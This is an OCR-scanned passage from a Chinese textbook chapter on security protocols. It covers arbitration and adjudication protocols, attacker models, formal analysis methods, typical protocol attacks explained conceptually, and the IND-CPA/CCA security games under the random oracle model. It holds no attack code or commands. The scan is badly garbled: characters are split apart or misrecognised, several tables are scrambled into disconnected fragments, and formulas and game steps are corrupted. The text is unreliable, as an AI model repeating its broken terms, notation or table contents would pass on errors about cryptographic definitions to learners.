规定 的 时 间 内 支票 不 能 兑现 , Alice 将 证 据 出 
示 给 律师 ,律师 将 车 的 所 有 权 和 钥匙 交还 给 
Alice。 

在 这 个 协议 中 , Alice 相信 律师 不 会 将 车 
的 所 有 权 交 给 Bob ,除非 支票 已 经 兑现 ; 如 果 
支票 不 能 兑现 ,律师 会 把 车 的 所 有 权 交 还 给 
Alice。 而 Bob 相信 律师 有 车 的 所 有 权 , 在 支 
票 兑现 后 ,将 会 把 车 主权 和 钥匙 交 给 他 。 而 律 
师 并 不 关心 支票 是 否 兑现 ,不 管 在 什么 情况 
下 ,他 只 做 那些 他 应 该 做 的 事 ,因为 不 管 在 哪 
种 情况 ,他 都 有 报酬。 在 这 例子 中 ,律师 起 着 
担保 代理 作用 。 律 师 也 作为 遗嘱 和 合同 谈判 
的 仲裁 人 ,还 作为 各 种 股票 交易 中 买方 和 卖方 
之 间 的 仲裁 人 。 


Alice 


和 合 、 仿 


Trent 
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(1) 仲裁 协议 


Trent 


Alice 


(2) 裁决 协议 
Bob 


合 


(3) 自动 执行 的 协议 


图 6.3 协议 类 型 


仲裁 人 的 概念 与 人 类 社会 一 样 悠久 。 总 是 有 那么 一 些 人 一 一 统治 者 牧师 等 ,他 们 有 公 
平 处 理事 情 的 权威 。 在 我 们 的 社会 中 ,仲裁 者 总 是 有 一 定 社会 地 位 和 声望 的 人 。 而 背叛 公 
众 的 信任 是 很 危险 的 事情 。 例 如 , 视 担 保 为 儿戏 的 律师 几乎 肯定 会 被 开除 出 律师 界 。 现 实 
世界 里 并 不 总 是 如 此 美好 的 ,但 它 确 是 理想 的 。 这 种 思想 可 以 转化 到 计算 机 世界 中 ,但 计算 


机 仲裁 者 有 下 面 几 个 问题 ,如 图 6.4 所 示 。 


者 便 是 一 个 易 受 攻击 的 弱点 。 


(1) 真实 性 : 如 果 你 知道 对 方 是 谁 ,并 能 见 到 他 的 面 ,就 很 容易 找到 和 相信 中 立 的 第 三 
方 。 互相 怀疑 的 双方 很 可 能 也 怀疑 在 网 络 别 的 什么 地 方 并 不 露面 的 仲裁 者 。 

(2) 费用 : 计算 机 网 络 必须 负担 仲裁 者 的 费用 。 

(3) 分 布 延迟 性 (无 全 局 时 钟 ) : 在 任何 仲裁 协议 中 都 有 延迟 的 特性 。 

(4) 单 点 失效 : 仲裁 者 必须 处 理 每 一 笔 交易 。 任 何 一 个 协议 在 大 范围 执行 时 ,仲裁 者 是 
潜在 的 瓶颈 。 增 加 仲裁 者 的 数目 能 缓解 这 个 问题 ,但 费用 将 会 增加 。 

(5) 单 点 安全 : 由 于 在 网 络 中 每 人 都 必须 相信 仲裁 者 ,对 试图 破坏 网 络 的 人 来 说 ,仲裁 


2. 裁决 协议 


图 6.4 数字 世界 中 仲裁 者 所 面临 的 问题 


由 于 雇用 仲裁 者 代价 高 昂 ,仲裁 协议 可 以 分 成 两 个 低级 的 子 协议 。 一 个 是 非 仲裁 子 协 
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议 ,这 个 子 协 议 是 想 要 完成 协议 的 各 方 每 次 都 必须 执行 的 ; 另 一 个 是 仲裁 子 协议 , 仅 在 例外 的 
情况 下 执行 的 , 即 有 争议 的 时 候 才 执行 ,这 种 特殊 的 仲裁 者 叫做 裁决 人 (参见 图 6. 3 中 的 (2))。 
裁决 人 也 是 公正 的 和 可 信 的 第 三 方 。 他 不 像 仲裁 者 ,并 不 直接 参与 每 一 个 协议 。 只 有 
为 了 要 确定 协议 是 否 被 公平 地 执行 , 才 将 他 请 来 。 
法 官 是 职业 的 裁决 者 。 法 官 不 像 公证 人 ,仅仅 在 有 争议 时 才 需 要 他 出 场 ,Alice 和 Bob 
可 以 在 没有 法 官 的 情况 下 订立 合同 。 除 非 他 们 中 有 一 个 人 把 另 一 人 拖 到 法 院 , 和 否则 法 官 决 
不 会 看 到 合同 。 实 例如 图 6. 5 所 示 。 


合同 签字 协议 可 以 归纳 为 下 面 形式 : 
非 仲裁 子 协议 (每 次 都 执行 ) : 

(1) Alice 和 Bob 谈判 合同 的 条 款 。 

(2) Alice 签署 合同 。 

(3) Bob 签署 合同 。 

裁决 子 协议 ( 仅 在 有 争议 时 执行 ) : 

(1) Alice 和 Bob 出 现在 法 官 面前 。 

(2) Alice 提出 她 的 证 据 。 

(3) Bob 也 提出 他 的 证 据 。 

(4) 法 官 根据 证 据 裁 决 。 


图 6.5 合同 


签字 协议 


裁决 者 和 仲裁 之 间 的 不 同 是 裁决 者 并 不 总 是 必需 的 。 如 果 有 争议 ,法 官 被 请 来 裁 
决 。 如 果 没 有 争议 ,就 没有 必要 请 法 官 。 在 好 的 裁决 协议 中 ,裁决 者 还 能 确定 欺骗 人 的 
身份 。 裁 决 协议 是 为 了 发 现 欺骗 ,而 不 是 为 了 阻止 欺骗 。 裁 决 协 议 起 了 防止 和 阻碍 欺骗 
的 作用 。 

3. 自动 执行 的 协议 

自动 执行 的 协议 是 协议 中 最 好 的 。 协 议 本 身 就 保证 了 公平 性 (参见 图 6. 3 中 的 (3))。 
不 需要 仲裁 者 来 完成 协议 ,也 不 需要 裁决 者 来 解决 争端 。 协 议 的 构成 本 身 不 可 能 发 生 任 何 
争端 。 如 果 协 议 中 的 一 方 试图 欺骗 ,其 他 各 方 马上 就 能 发 觉 并 且 停 止 执行 协议 。 无 论 欺 骗 
方 想 通 过 欺骗 来 得 到 什么 ,他 都 不 能 如 愿 以 偿 。 最 好 ,让 每 个 协议 都 能 自动 执行 。 不 幸 的 
是 ,在 所 有 情形 下 ,没有 一 个 是 自动 执行 的 协议 。 


6.2.3 其 他 方法 


根据 ISO 的 七 层 参 考 模型 ,又 可 以 将 安全 协议 分 成 高 层 协议 和 低层 协议 ; 按照 安全 协 
议 中 采用 的 密 钥 算法 的 种 类 ,又 可 以 分 成 双 钥 (或 公 钥 ) 协 议 . 单 钥 (或 私 钥 ) 协 议 或 混合 协议 
等 ; 依据 安全 协议 应 用 的 环境 ,又 可 以 分 为 互联 网 中 的 安全 协议 .卫星 通信 和 网络 中 的 安全 
协议 无线 传 感 器 网 络 中 的 安全 协议 、RFID 系统 中 的 安全 协议 等 ; 对 于 参与 实体 间 拥 有 
预 共 享 长 期 密 钥 的 安全 协议 ,根据 长 期 密 钥 的 安全 强度 ,又 可 以 分 为 基于 口令 的 安全 协 
议和 一 般 的 预 共 享 密 钥 安全 协议 。 除 此 之 外 ,还 可 以 从 其 他 的 角度 出 发 对 安全 协议 进行 
分 类 。 


6.3 安全 协议 的 模型 与 分 析 方法 


安全 协议 的 分 析 方 法 主要 分 为 计算 机 安全 方法 ”“ 计 算 复 杂 性 方法 ”和 “物理 豪 性 方 
法 ”。 其 中 “计算 机 安全 方法 ”和 “计算 复杂 性 方法 ”的 主要 模型 与 分 类 将 在 本 章 介 绍 (参见 
表 6.7 和 表 6. 8) ,而 “物理 裹 性 方法 ”相关 内 容 请 参考 第 5 童 。 
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计算 机 安全 方法 | | 计算 复杂 性 方法 | | 物理 京 性 方法 
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图 6.6 安全 协议 分 析 技术 


表 6.6 攻击 者 能 力 模型 


攻击 能 力 分 类 能 力 描 述 
。 仅仅 能 够 在 协议 开始 前 攻陷 参与 方 ,协议 开始 之 后 ,未 攻陷 
夺 旧 适 府 况 击 者 仍然 是 未 攻陷 者 ,攻击 者 控制 着 一 个 任意 的 但 是 固定 的 
Corruption (静态 攻击 者 ) 
模型 (攻陷 能 力 ) 要 二 各 答 
自 适 应 攻击 者 在 协议 执行 过 程 中 或 基于 时 实 的 信息 收集 中 随意 选择 攻陷 
(动态 攻击 者 ) 参与 方 
被 动 攻 击 者 所 有 的 参与 方 (包括 被 攻陷 的 用 户 ) 忠 实 的 实施 协议 的 规则 
Action 模型 (窃听 者 (仅仅 能 够 搜集 信息 》 
(活动 方式 ) 主动 攻击 者 完全 控制 通信 信道 ,能 够 删除 、 注 入、 修改 、 重 放 、 阻 止 信道 
(拜占庭 ) 中 的 消息 ,能 够 调度 协议 的 执行 ,具有 中 间 人 攻击 能 力 
计算 安全 模型 参与 方 通过 认证 信道 通信 ,敌手 能 够 学 习 参 与 方 之 间 所 有 
Power 模型 (Computational) 通信 信息 ,并 且 敌 手 能 力 限定 于 概率 多 项 式 时 间 
(计算 能 力 ) 信息 论 安全 模型 参与 方 通过 安全 (private) 的 信道 通信 ,攻击 者 不 限定 攻击 
(Information-Theoretic) | 能 力 


基本 假设 : 任何 时 间 被 攻陷 的 参与 方 严格 限定 少 于 二 分 之 一 。 
( 当 达 到 一 半 或 更 多 的 参与 方 被 攻陷 ,那么 安全 定义 将 不 得 不 弱化 ) 
基本 条 件 : (1) Erase Model: 用 户 仅 仅 向 攻击 者 提供 初始 的 秘密 输入 信息 (如 签名 算法 的 密 钥 信息 ); 
Non-Erase Model: 用 户 向 攻击 者 提供 当前 的 内 部 状态 信息 (如 用 户 初始 的 秘密 输入 信 
息 , 协 议 交互 过 程 中 使 用 的 随机 比特 信息 和 引入 的 秘密 信息 )。 
(2) 当 检 测 到 攻击 时 ,允许 协议 在 未 泄露 敏感 信息 前 ,执行 早期 停止 是 安全 的 。 
(3) 通信 错误 已 经 被 底层 软件 透明 地 处 理 。 


人 安 会 故 议 概述 


贡 o 站 


秦 于 案例 的 网 络 安全 技术 与 实践 


表 6.7 安全 协议 形式 化 设计 与 分 析 方 法 


方 法 分 类 描述 与 实例 
一 | 很 难 确 信 协 议 的 安全 性 ; 反 反 复 复 的 修补 增加 了 实现 代价 
攻击 检测 Sg 或 成 本 ,降低 人 们 对 安全 的 信心 。 如 大 部 分 智能 卡 安全 协 
议 设计 论文 
由 一 些 命题 和 扒 理 规则 组 成 。 如 ;BAN 及 BAN 类 逻辑 ， 
基于 模 坊 多 加 GNY 逻辑.AT 逻辑 .VO 逻辑 .SVO 逻辑 等 
模型 检测 法 一 种 验证 有 限 状 态 系统 的 自动 化 技术 。 常 用 的 模型 检测 工 
符号 理论 : (状态 空间 搜索 法 ) 具有 Interrogator、NRL、FDR、Mur$、SMYV 等 
自动 的 机 器 对 形式 化 后 的 协议 模型 和 规约 运用 证 明 的 技术 来 证 明 规约 
描述 分 析 。 | 定理 证 明 法 是 否 在 协议 模型 中 满足 。 如 Paulson 归纳 法 . 串 空 间 、 阶 函 
数 、Spi 演算 竺 
本 二 种 对 离散 并 行 系统 的 数学 表示 ,其 异步 并 发 的 特点 适合 
于 安全 协议 的 描述 
Dolev Yao 模型 : 首次 将 安全 协议 引入 形式 化 研究 , 即 把 安 
孤立 模型 (Stand Alone): | 全 协议 本 身 与 安全 协议 所 具体 采用 的 密码 系统 分 开 研究 
假设 某 个 确定 协议 运行 在 | CRS(common reference string) 模 型 : 所 有 参与 方 预先 分 配 
一 个 独立 的 计算 环境 中 。 | 好 公共 参数 ,但 是 任何 参与 方 都 无 法 得 知 某 个 / 某 些 秘密 
计算 复杂 性 ， 密 铀 
把 协 议 规 | 可 证 明 安 全 将 概率 引入 密码 学 ,从 概率 的 角度 分 析 安全 性 
约 到 i Hash 函数 被 假设 为 理想 函数 ,生成 真 随机 值 。 提 出 精确 安 
and al 全 性 (Exact Security) 的 概念 : 不 仅 要 满足 问题 复杂 度 的 渐 
近 度量 的 安全 性 ,而 且 要 得 到 精确 的 安全 性 度量 0 
We 假设 存在 公开 可 获得 的 理想 分 组 密码 ,生成 随机 真 值 
标准 模型 Standard Model ”| 安全 性 证 明言 接 规约 于 菜 个 / 菜 些 朵 难 问 题 
CK 模 型 通过 模块 化 的 方法 来 分 析 和 设计 密 铀 交换 协议 
二 不 图 对 [BC 机 针对 群 组 密 钥 交换 协议 进行 安全 性 分 析 
描述 和 分 析 并 发 复合 情况 下 密码 协议 的 安全 性 ; 自 复合 
通用 可 复合 模 型 | 车 同一 个 协议 运行 多 个 协议 实例 ,协议 仍然 是 安全 的 ; 通 
(Universal-Composition) | 用 复合 : 若 多 个 协议 运行 多 个 协议 实例 ,协议 仍然 是 安全 
的 。 如 Canitti 的 无 认证 安全 计算 等 论文 
Re 如 Canitti 将 UC 理论 与 符号 模型 结合 起 来 ,针对 认证 密 
pi 钥 交 换 协议 证 明了 一 个 重要 结果 : 安全 协议 满足 计算 理论 
。 意义 上 的 安全 性 质 当 且 仅 当 其 菜 种 对 应 的 符号 模型 满足 某 


种 形式 安全 性 质 


@ 随机 预言 模型 可 视 为 对 敌手 能 力 的 某 种 限制 一 一 敌手 的 攻击 是 不 考虑 任何 特殊 Hash 函数 实例 的 一 般 攻 击 ,而 
且 如 果 假定 存在 某 些 防 帘 扰 设备 (如 Smart Cards) , 则 随机 预言 模型 等 价 于 标准 模型 ,这 时 只 要 求 伪 随机 函数 存在 。 

回 多 个 参与 方 分 别 运行 某 个 确定 的 两 方 或 多 方 计算 协议 (多 用 户 ) ,多 个 不 同 的 密码 协议 同时 运行 (多 协议 ) , 某 个 
密码 协议 的 多 个 协议 实例 同时 运行 (多 实例 ) 、 某 个 协议 实例 参与 方 可 能 需要 以 别名 的 形式 参与 协议 交互 (多 身份 ) 。 


6.4 安全 协议 的 目标 与 研究 层次 


安全 协议 的 主要 研究 目标 如 表 6. 8 所 示 。 
表 6.8 安全 协议 目标 


性 质 描 述 
正确 性 满足 规则 : 对 于 合理 的 输入 ,给 出 合理 的 输出 
安全 人 性 抵制 攻击 : 对 于 不 合理 的 输入 ,输出 不 会 造成 某 种 程度 的 损害 
完整 性 保证 信息 无 修改 : 认证 , 非 否认 、 可 审计 等 
秘密 性 保证 信息 无 泄漏 : 加 密 、 隐 私 、 匿 名 ,假名 等 
可 用 性 保证 合法 用 户 的 信息 使 用 
匿名 性 隐藏 参与 方 的 身份 
公平 性 保证 参与 者 在 协议 中 具有 公平 的 地 位 
可 和 否认 性 消息 的 接收 方 能 够 辨别 出 发 送 方 的 身份 ,但 是 不 能 向 第 三 方 证 明 发 送 方 身份 
不 可 否认 保证 参与 者 对 所 做 的 行为 负责 


按照 人 的 主观 因素 “信任 0” 的 存在 与 否 ,可 将 安全 协议 分 为 两 大 层次 : 在 传统 的 网 络 安 
全 机 制 中 ,被 保护 主体 指 的 是 服务 提供 者 ,恶意 主体 一 般 来 自 服务 请 求 者 ,这 种 安全 机 制 被 
称 为 硬 安全 (hard security); 由 信任 机 制 提 供 的 安全 保护 措施 称 为 软 安全 (soft security)， 
如 表 6.9 所 示 。 


表 6.9 信任 机 制 与 传统 安全 机 制 比较 


类 型 被 保护 对 象 潜在 的 恶意 用 户 
信任 机 制 软 安全 服务 请 求 者 服务 提供 者 
传统 安全 机 制 硬 安全 服务 提供 者 服务 请 求 者 


传统 安全 机 制 与 信任 安全 机 制 之 间 也 存在 着 联系 。 受 传统 安全 机 制 保护 的 计算 机 或 网 
络 系统 不 易 受到 恶意 节点 的 攻击 ,内 部 存在 恶意 程序 (如 木马 ) 的 可 能 性 也 会 降低 ,此 类 系统 
的 可 信和 度 就 会 高 ; 相反 那些 没有 安全 机 制 保护 的 节点 的 可 信和 度 就 会 低 。 另 外 ,在 传统 安全 
机 制 中 也 存在 信任 机 制 ,主要 依靠 可 信赖 的 第 三 方 进行 身份 鉴别 。 这 两 种 安全 机 制 从 不 同 
的 角度 保护 网 络 系 统 的 安全 ,二 者 相互 补充 , 硬 安全 与 软 安全 的 典型 攻击 分 别 如 表 6. 10 和 
表 6. 11 所 示 。 

事实 上 ,攻击 方法 难以 穷尽 ,因此 ,对 认证 协议 的 分 析 和 设计 不 能 特定 针对 某 一 种 或 几 
种 已 知 类 型 的 攻击 ,而 是 需要 综合 考虑 所 有 可 能 的 安全 威胁 ,研究 安全 协议 的 设计 与 分 析 的 
理论 ,通过 形式 化 的 方法 进行 协议 的 安全 性 和 正确 性 的 分 析 和 证 明 。 


@ 信任 是 主动 的 ,是 一 个 主体 对 另 一 个 主体 某 种 能 力 的 评价 ,建立 在 对 历史 信息 的 评估 上 。 
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表 6.10 硬 安全 典型 攻击 


典型 攻击 描 述 
重 放 攻 击 又 称 重播 攻击 ,是 指 攻 全息 政 市: 改变 消息 的 去 向 
直接 攻击 : 将 消息 发 送 给 意 定 接收 方 
击 者 发 送 一 个 目的 主机 已 接收 
消息 重 放 攻击 反射 攻击 (Reflection Attack): 将 消息 
过 的 包 , 来 达到 欺骗 系统 的 目 | 、 、 
(Message Replay Attack) 的 。 产 生 原因 在 于 消息 无 新 鲜 返回 给 发 送 者 
生计 证 第 三 方 攻击 : 将 消息 发 给 协议 合法 通 
信 双 方 之 外 的 任 一 方 
中 间 人 攻击 一 种 “间接 ”的 入 侵 攻击 ,这 种 攻击 模式 是 通过 各 种 技术 手段 将 受信 侵 者 控 
ts ee tod 制 的 一 台 计 算 机 虚拟 放置 在 网 络 连 接 中 的 两 台 通 信 计 算 机 之 间 , 这 台 计 算 
机 就 称 为 “中 间 人 ” 
平行 会 话 攻击 并 发 的 多 个 协议 运行 使 得 攻击 者 能 够 从 一 个 运行 中 得 到 解决 另外 某 个 运 
(Parallel Session Attack) 行 中 的 困难 问题 的 答案 
边 信道 攻击 针对 电子 设备 在 运行 过 程 中 的 时 间 消 耗 ,功率 消耗 或 电磁 辐射 之 类 的 信息 
lle Chiel Meal 泄露 而 进行 攻击 的 方法 被 称 为 边 信道 攻击 。 这 类 新 型 攻击 的 有 效 性 远 高 
于 密码 分 析 的 数学 方法 ,因此 给 密码 设备 带 来 了 严重 的 威胁 
表 6.11 软 安全 典型 攻击 
表 现 举 例 


行为 播 摆 : 先 作为 诚实 用 户 提供 服务 ,在 得 到 信任 后 进行 恶意 行为 ,或 者 在 
小 额 交易 上 表现 诚实 而 在 大 额 交 易 上 进行 欺骗 

合谋 作弊 : 如 多 个 恶意 节点 联合 进行 欺诈 ,增加 了 行为 隐蔽 性 

多 账号 攻击 : 女巫 攻击 (Sybil Attack) 、 漂 白 攻击 (White Washing) 


策略 性 地 提供 恶意 服务 


提交 虚假 评价 .虚假 推 
荐 信任 数 


6.5 安全 协议 的 设计 原则 


不 同类 型 的 安全 协议 的 设计 原则 也 不 尽 相同 , 表 6. 12 只 是 总 结 了 安全 协议 设计 中 的 一 
些 共同 的 属性 ,在 设计 某 一 具体 的 安全 协议 时 ,还 要 根据 具体 情况 制定 设计 原则 。 
表 6.12 安全 协议 设计 原则 
(1) 设计 目标 明确 ,无 二 义 性 
(2) 尽量 采用 最 少 的 安全 假设 
(3) 应 用 描述 协议 的 形式 语言 
(4) 使 用 规范 的 证 明 流程 与 分 析 方 法 
(1) 适用 于 任何 网 络 结构 的 任何 协议 层 (消息 要 尽 可 能 地 短 ) 
(2) 适用 于 任何 数据 处 理 能 力 (消息 尽 可 能 地 简单 ) 
(3) 可 采用 任何 密码 算法 (必须 采用 任何 已 知 的 和 具有 代表 性 的 密码 算法 ) 
(4) 安全 性 与 具体 采用 的 算法 无 关 
(5) 便于 进行 功能 扩充 ,特别 是 在 方案 上 应 该 能 够 支持 多 用 户 之 间 的 密 钥 共享 
(1) 采用 一 次 性 随机 数 来 替代 时 戳 , 即 用 异步 认证 方式 来 替代 同步 认证 方式 ,同时 也 保证 了 
新 鲜 性 
(2) 具有 抵御 常见 攻击 的 能 力 。 特 别 是 重 放 攻击 
(3) 通常 针对 不 同 的 环境 而 采取 不 同 的 设计 方法 ,在 安全 性 与 效率 之 间 达 到 一 种 平衡 


整体 性 


扩展 性 


安全 性 & 
高 效 性 


6.6 安全 协议 的 可 证 明理 论 


6.6.1 密码 体制 的 攻击 游戏 


根据 密码 分 析 者 破译 时 已 经 具备 的 前 提 条 件 ,通常 将 攻击 类 型 分 为 如 下 4 种 。 

(1) 唯 密 文 攻击 : 密码 分 析 者 有 一 个 或 更 多 的 用 同一 个 密 钥 加 密 的 密 文 , 通 过 对 这 些 
截获 的 密 文 进行 分 析 得 出 明文 或 密 钥 。 

(2) 已 知 明文 攻击 : 除了 待 解密 的 密 文 以 外 ,密码 分 析 者 还 有 一 些 明文 和 用 同一 个 密 
钥 加 密 这 些 明 文 所 对 应 的 密 文 。 

(3) 选择 明文 攻击 : 密码 分 析 者 可 以 得 到 所 需要 的 任何 明文 所 对 应 的 密 文 ,这 些 密 文 
与 待 解密 的 密 文 是 用 同一 个 密 钥 加 密 得 到 的 。 

(4) 选择 密 文 攻击 : 密码 分 析 者 可 以 得 到 所 需要 的 任何 密 文 所 对 应 的 明文 ,解密 这 些 
密 文 所 使 用 的 密 钥 与 解密 待 解密 的 密 文 所 需 的 密 钥 是 相同 的 。 

上 面 4 种 攻击 类 型 的 强度 按 顺 序 递增 。 面 对 各 种 攻击 ,为 了 保护 信息 的 机 密 性 ,抵抗 密 
码 分 析 ,保密 系统 应 当 满 足以 下 要 求 : 

(1) 系统 即使 达 不 到 理论 上 是 不 可 破解 的 ,也 应 当 是 实际 上 不 可 破解 的 。 也 就 是 说 ,从 
截获 的 密 文 或 某 些 已 知 的 明 密 文 对 中 ,要 确定 密 钥 或 任意 明文 在 计算 上 是 不 可 行 的 。 

(2) 系统 的 保密 性 不 依赖 于 对 加 密 体制 或 算法 的 保密 ,而 依赖 于 密 钥 。 

(3) 加 密 和 解密 算法 适用 于 所 有 密 钥 空 间 中 的 元 素 。 

(4) 系统 既 易 于 实现 又 便于 使 用 。 

为 形式 化 密码 体制 的 安全 性 ,通常 采用 密码 体制 攻击 游戏 的 方法 对 安全 性 进行 分 析 ,对 
于 不 同 强度 的 攻击 ,游戏 协议 也 是 不 一 样 的 。 对 于 唯 密 文 攻击 和 已 知 明文 攻击 ,攻击 的 过 程 
是 静态 的 ,不 存在 和 密码 体制 交互 的 过 程 , 因 此 这 两 类 攻击 没有 对 应 的 模拟 游戏 。 

对 于 后 两 类 攻击 ,攻击 者 可 以 和 密码 体制 交互 ,以 得 到 它 想 要 的 明文 或 密 文 。 因 此 在 分 
析 密 码 体 制 对 于 后 两 类 攻击 的 安全 性 时 ,有 必要 进行 模拟 攻击 游戏 。 同 时 ,为 了 证 明 密 码 体 
制 的 安全 性 ,也 通常 通过 模拟 攻击 游戏 来 进行 。 不 可 区 分 的 选择 明文 攻击 (Polynomially 
Indistinguishable Chosen Plain-text Attack, IND-CPA) 游 戏 协议 如 下 。 

(1) 不 可 区 分 的 选择 明文 攻击 游戏 (IND-CPA) ,如 图 6.7 所 示 。 


协议 6.1: 不 可 区 分 的 选择 明文 攻击 。 
假定 : (1) Malice 和 预言 机 o 商定 目标 密码 体制 下 ,明文 空间 为 M, 密 文 空间 为 C。 
(2) o 固定 了 E 的 一 个 加 密 密 钥 人. 。 
游戏 : (1) Malice 选择 两 条 不 同 的 明文 m。 和 mm 并 发 送 给 o。 
(2) 投掷 一 个 公平 硬币 Eu{f0,1} ,然后 执行 下 面 的 加 密 操作 
Elm)， 如果 5b= 二 0 
区 have 如 果 b 二 1 
(3) go 将 c" 发送 给 Malice。 
(4) 收 到 询问 密 文 c* 后 ,Malice 必须 回答 0 或 者 1, 作 为 他 对 o 的 硬币 投掷 结 
果 的 猜测 。 


6.7 不 可 区 分 的 选择 明文 攻击 游戏 
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假定 Malice 是 一 个 概率 多 项 式 时 间 (PPT) 区 分 器 ,优势 函数 Adv 表示 Malice 区 分 

Ei (mo) 和 Ei (mi ) 的 概率 差 , 则 
Adv =| Pr[0 <— Malice(c’ = Ex (0))]— Pr[L1l <— Malice(c” = Exim))] | 

由 于 Malice 的 猜测 不 仅仅 依赖 于 询问 密 文 e* ,还 依赖 于 有 所 选择 的 两 条 明文 消息 
Gno， ml) ,因此 可 以 把 它 的 回答 看 做 是 一 个 有 根据 的 猜测 ”。 如 果 Adv 对 于 安全 参数 是 一 
个 可 忽略 的 量 , 则 称 已 Co) 和 Ei (mm ) 是 不 可 区 分 的 , 即 目标 密码 体制 对 于 协议 6. 1 的 攻 
击 游戏 是 安全 的 ,由 此 可 以 得 出 结论 ,认为 目标 密码 体制 是 IND-CPA 安全 的 ,IND-CPA 安 
全 又 称 为 语义 安全 。 

但 仅 具有 IND-CPA 安全 性 的 密码 体制 是 无 法 抵抗 选择 密 文 攻击 的 。 而 在 密码 系统 的 
应 用 中 ,要 求 天 真 的 用 户 总 是 保持 警醒 而 不 提供 解密 预言 服务 是 不 实际 的 。 所 以 ,我 们 需要 
更 强 的 安全 概念 。 强 化 安全 概念 的 下 一 步 是 进一步 降低 Malice 攻破 目标 密码 体制 的 难度 : 
除了 在 IND-CPA 游戏 中 可 以 获得 的 加 密 帮 助 以 外 ,还 允许 Malice 获得 解密 模式 下 的 有 条 
件 帮 助 。 这 个 攻击 模型 称 为 不 可 区 分 选择 密 文 攻 击 (Polynomially Indistinguishable 
Chosen Cipher-text Attack, IND-CCA), 以 下 是 这 个 攻击 游戏 的 描述 。 

(2) 不 可 区 分 的 选择 密 文 攻击 游戏 (IND-CCA) ,如 图 6.8 所 示 。 


协议 6.2: 不 可 区 分 的 选择 密 文 攻击 。 
假定 : (1) Malice 和 预言 机 o 商定 目标 密码 体制 巨 ,明文 空间 为 M, 密 文 空间 
为 C。 
(2) o 固定 了 EE 的 一 个 加 密 密 钥 人。 。 
(3) Malice 获取 了 一 些 密 文 信息 。 
游戏 : (1) Malice 向 o 发 送 一 条 准备 好 的 密 文 消息 cEC。 
(2) c 解 密 c, 返 回 解密 结果 给 Malice; 上 述 两 步 可 多 次 重复 , 称 为 “密码 学 
训练 ”。 
(3) 当 Malice 对 “密码 学 训练 课程 ”感到 满意 ,就 与 o 进行 协议 6. 1 中 的 
CPA 游戏 。 


图 6.8 不 可 区 分 的 选择 密 文 攻击 游戏 


强化 安全 的 更 进一步 考虑 称 为 不 可 区 分 适应 性 选择 密 文 攻击 (Polynomially 
Indistinguishable Active Chosen Cipher-text Attack, IND-CCA) ,在 这 个 模型 中 ,Malice 攻 
击 密码 体制 的 难度 进一步 降低 。 在 协议 6. 2 中 解密 帮助 是 有 条 件 的 ,一 旦 Malice 提交 两 条 
选择 明文 消息 (me， za ) ,该 帮助 就 停止 。 也 就 是 说 ,一 旦 IND-CPA 游戏 攻击 开始 ,就 再 也 
不 能 得 到 解密 帮助 了 。 

(3) 不 可 区 分 的 适应 性 选择 密 文 攻击 游戏 (IND-CCA) ,在 新 的 攻击 模型 中 ,去 掉 了 只 
能 在 短 时间 内 得 到 解密 服务 这 个 现实 的 限制 ,如 图 6.9 所 示 。 

如 今 ,IND-CCA2 是 公 钥 密 码 体 制 的 标准 ,也 是 适 于 应 用 的 安全 性 概念 。 所 有 普通 用 
途 的 新 公 钥 加 密 方案 必须 具备 该 安全 性 。 

目前 ,普遍 认为 公 钥 加 密 方案 各 种 安全 性 概念 之 间 的 关系 如 图 6. 10 所 示 。 

哈 希 函数 的 “混合 变换 ”性 质 可 以 描述 为 : 对 于 任意 的 输入 ,输出 哈 希 值 的 分 布 和 函数 与 
输出 空间 上 的 均匀 分 布 在 计算 上 是 不 可 区 分 的 。 如 果 将 “与 输出 空间 上 的 均匀 分 布 在 计算 上 
不 可 区 分 " 变 成 “是 均匀 的 ”, 那 么 哈 希 函数 就 变 成 一 种 很 强 的 、 虚 构 的 函数 . 称 为 随机 预言 机 。 


协议 6.3: 不 可 区 分 的 适应 性 选择 密 文 攻击 。 
假定 : (1) Malice 和 预言 机 o 商定 目标 密码 体制 下 ,明文 空间 为 M, 密 文 空间 
WE 
(2) o 固定 了 EE 的 一 个 加 密 密 钥 k.。 
游戏 : (1) Malice 和 o 进行 协议 6. 2 中 的 选择 密 文 攻击 游戏 。 
(2) Malice 进一步 计算 密 文 EC, 将 其 提交 给 解密; 此 步 可 多 次 重复 。 
(3) 当 Malice 对 “密码 学 训练 "感到 满意 了 ,就 必须 回答 0 或 1, 作 为 他 对 o 
的 硬币 投掷 结果 的 猜测 。 


6.9 不 可 区 分 的 适应 性 选择 密 文 攻击 游戏 


NM-CPA 一 NM-CCA 


IND-CPA 一 IND-CCA 


OW-CPA 一 OW-VCA 一 OW-PCA 一 一 OW-CCA 


OW- 单 向 CPA- 选 择 明文 攻击 

IND- 不 可 区 分 (语义 安全 ) “VCA- 有 效 性 检验 攻击 

NM- 非 延展 PCA- 明 文 检验 攻击 
CCA- 选 择 密 文 攻击 


图 6. 10 ” 公 钥 加 密 方案 各 种 安全 性 概念 之 间 的 关系 


6.6.2 随机 预言 模型 下 的 安全 性 证 明 


随机 预言 机 具有 以 下 3 种 性 质 : 确定 性 有 效 性 和 均匀 输出 ,在 真实 的 环境 中 不 存在 随 
机 预言 机 。 而 真实 环境 中 的 哈 希 函数 仅仅 以 某 种 精度 仿真 随机 预言 机 的 行为 ,期 望 它们 之 
间 的 差异 是 一 个 可 以 忽略 的 量 。 

哈 希 函数 仿真 随机 预言 机 的 行为 在 公 钥 密 码 系统 中 扮演 着 重要 的 角色 。 从 本 质 上 说 ， 
对 一 个 消息 求 哈 希 值 就 是 以 一 个 确定 的 可 验证 的 方式 为 该 消息 增加 一 定 的 元 余 量 。 

为 了 证 明 密 码 体 制 的 安全 性 , Bellare 和 Rogaway 提出 了 随机 预言 (Random Oracle， 
RO) 模 型 。 在 此 模型 中 , 哈 希 函 数 被 理想 化 为 随机 预言 机 ,而 具有 决定 性 ,高效 性 .均匀 输出 
的 特性 。 密 码 协议 在 RO 模型 中 设计 、 分 析 ,并 以 用 实际 的 哈 希 函数 替代 随机 预言 机 的 方式 
进行 实例 化 。 需 要 强调 的 是 ,证 明 是 在 随机 预言 模型 中 进行 的 ,因此 * 用 哈 希 函数 替代 随机 
预言 机 可 保持 密码 体制 的 安全 性 ”本 质 上 是 一 种 猜测 。Bellare 和 Rogaway 认为 ,虽然 这 种 
证 明 方法 并 不 是 完全 的 ,但 在 很 大 程度 上 是 有 效 的 。 

采用 密码 攻击 游戏 证 明 密码 体制 安全 性 的 思想 是 : 假定 存在 一 个 概率 多 项 式 时 间 攻 击 
